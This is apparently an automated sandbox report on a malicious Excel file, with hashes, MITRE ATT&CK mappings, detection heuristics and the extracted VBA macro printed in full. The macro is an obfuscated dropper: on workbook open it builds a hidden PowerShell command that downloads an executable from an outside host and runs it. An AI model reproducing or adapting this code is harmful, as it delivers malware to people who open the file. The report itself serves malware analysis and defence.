Office (OLE) malware analysis — malicious · 080f0bfedd2aff14

MALICIOUS

Office (OLE)

54.0 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2019-04-18

MD5: fe3732a27182aedb0b08e849687ce49f SHA-1: a37bb6d5b83fb810a82c2f305289375a77a18e45 SHA-256: 080f0bfedd2aff146ce14f8d9b781638b1253fda5cff44670ebbc65f6bc0e5e1

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA macros. The Workbook_Open macro is present, suggesting execution upon opening the Excel file. The reconstructed command `cmDwShE Ll -n oPRoFi -WIn HiDden -nOnInT erA -ExEcuTI byP ss " /c"` likely downloads and executes a second-stage payload, a common dropper behavior.

Heuristics 4

ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2926 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2926 bytes
SHA-256: `23ffbd056e9b2af3bce48ac499e28177b3e9cfa15b7b70d892e84672688e2416`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Function patalofiid() sifuyoda = "ss','a" + "rt','-Pr'" + ") $D" tabacooppiim = "whi" patalofiid = tabacooppiim + "le(!" + "${?});" + "&(\""{0" + "}{2" + "}{3}{1}\""-f 'St'" + ",'o" + "ce" + sifuyoda + "es\" End Function Function stupiida() nizergoob = "{D`es} = $7d" stupiida = "do{" + "&(" + "\""{1" + "}{0}\"" -f'e" + "p'," + "'sl" + "e') 3" + "3;$" + nizergoob End Function Function portoshipper() If msoBlogMultipleCategories > 0 Then listercorvin = Array(Minute(Now), Second(Now), "oP" + "RoFi -W", Now(), Second(Now)) izusesphone = Array(Minute(Now), Second(Now), "Er", Minute(Now)) sekemakol = Array(Second(Now), Minute(Now), "nONinT", Now()) opergrouper = "a" nalmaclever = Array(Second(Now), Minute(Now), "Ecu" + "TI", Minute(Now), Minute(Now)) adeliacoler = Array(Second(Now), "d" + "en -n", Minute(Now)) zyziopera = Array(Second(Now), opergrouper + "ss """, Second(Now), Minute(Now), "d " + " /c""", Minute(Now)) portoshipper = "c" + "m" + zyziopera(4) + "p" + "Ow" + izusesphone(2) + "ShE" + "Ll -n" + listercorvin(2) + "In HiD" + adeliacoler(1) + "oLo -" + sekemakol(2) + "erA -Ex" + nalmaclever(2) + "OnP byP" + zyziopera(1) End If End Function Function hintermulls() kodakpictured = "vIr'" + ",'N" + "t','mE') ; " hintermulls = "$7d" + "0mK6 = [Ty" + "PE" + "](\""{1}{0" + "}{3}{2}\"" -f 'on'," + "'eN" + kodakpictured End Function Sub Workbook_Open() pomologos = "p" If msoAlertCancelThird > 0.09 Then Dim agorofodo As String Randomize agorofodo = Int(Rnd * 9882761#) fimmenos = agorofodo berlinootto = stupiida + "0mk" + "6:" + ":g" + "Et" + "foL" + "deRp" + "ATh(\""De" + "sktop" + "\"");(&(\""{" + "0}{1" + "}{2}\"" -f'N" + "e','w-'" + ",'Ob" + "je" + "ct') " nishspace = bissmarus + ".Ne','ent','t.Web','ClI')).dOwNLOaDfiLE.INVokE(\""ht" + "t" + "p://mo" + "merton.c" + "om/a" + "tsms\"",\""$D" + "es\" + fimmenos + ".e" + "xe\"")}" quttrowheels = patalofiid + fimmenos + ".ex" + "e""" xedosmaza = hintermulls + berlinootto + nishspace + quttrowheels hubabbuba = portoshipper + xedosmaza zalkaoreos = msoAnimationLookDown - 104 Shell hubabbuba, zalkaoreos End If End Sub Function bissmarus() bissmarus = "(\""{0}" + "{2}{1}{3}{" + "5}{6}" + "{4}\""-f'" + "Sy'" + ",'te','s','m" End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 23ffbd056e9b2af3bce48ac499e28177b3e9cfa15b7b70d892e84672688e2416

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True







Function patalofiid()

sifuyoda = "ss','a" + "rt','-Pr'" + ") $D"
tabacooppiim = "whi"
patalofiid = tabacooppiim + "le(!" + "${?});" + "&(\""{0" + "}{2" + "}{3}{1}\""-f 'St'" + ",'o" + "ce" + sifuyoda + "es\"
End Function



Function stupiida()
nizergoob = "{D`es} =  $7d"
stupiida = "do{" + "&(" + "\""{1" + "}{0}\"" -f'e" + "p'," + "'sl" + "e') 3" + "3;$" + nizergoob
End Function

Function portoshipper()
If msoBlogMultipleCategories > 0 Then
listercorvin = Array(Minute(Now), Second(Now), "oP" + "RoFi -W", Now(), Second(Now))
izusesphone = Array(Minute(Now), Second(Now), "Er", Minute(Now))



sekemakol = Array(Second(Now), Minute(Now), "nONinT", Now())
opergrouper = "a"
nalmaclever = Array(Second(Now), Minute(Now), "Ecu" + "TI", Minute(Now), Minute(Now))

adeliacoler = Array(Second(Now), "d" + "en -n", Minute(Now))
zyziopera = Array(Second(Now), opergrouper + "ss    """, Second(Now), Minute(Now), "d  " + " /c""", Minute(Now))
portoshipper = "c" + "m" + zyziopera(4) + "p" + "Ow" + izusesphone(2) + "ShE" + "Ll -n" + listercorvin(2) + "In  HiD" + adeliacoler(1) + "oLo -" + sekemakol(2) + "erA  -Ex" + nalmaclever(2) + "OnP byP" + zyziopera(1)
End If
End Function

Function hintermulls()
kodakpictured = "vIr'" + ",'N" + "t','mE') ;  "
hintermulls = "$7d" + "0mK6 = [Ty" + "PE" + "](\""{1}{0" + "}{3}{2}\"" -f 'on'," + "'eN" + kodakpictured
End Function
Sub Workbook_Open()
pomologos = "p"
If msoAlertCancelThird > 0.09 Then
Dim agorofodo As String

Randomize
agorofodo = Int(Rnd * 9882761#)
fimmenos = agorofodo
berlinootto = stupiida + "0mk" + "6:" + ":g" + "Et" + "foL" + "deRp" + "ATh(\""De" + "sktop" + "\"");(&(\""{" + "0}{1" + "}{2}\"" -f'N" + "e','w-'" + ",'Ob" + "je" + "ct') "

nishspace = bissmarus + ".Ne','ent','t.Web','ClI')).dOwNLOaDfiLE.INVokE(\""ht" + "t" + "p://mo" + "merton.c" + "om/a" + "tsms\"",\""$D" + "es\" + fimmenos + ".e" + "xe\"")}"
quttrowheels = patalofiid + fimmenos + ".ex" + "e"""
xedosmaza = hintermulls + berlinootto + nishspace + quttrowheels
hubabbuba = portoshipper + xedosmaza
zalkaoreos = msoAnimationLookDown - 104
Shell hubabbuba, zalkaoreos
End If
End Sub

Function bissmarus()
bissmarus = "(\""{0}" + "{2}{1}{3}{" + "5}{6}" + "{4}\""-f'" + "Sy'" + ",'te','s','m"
End Function









Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.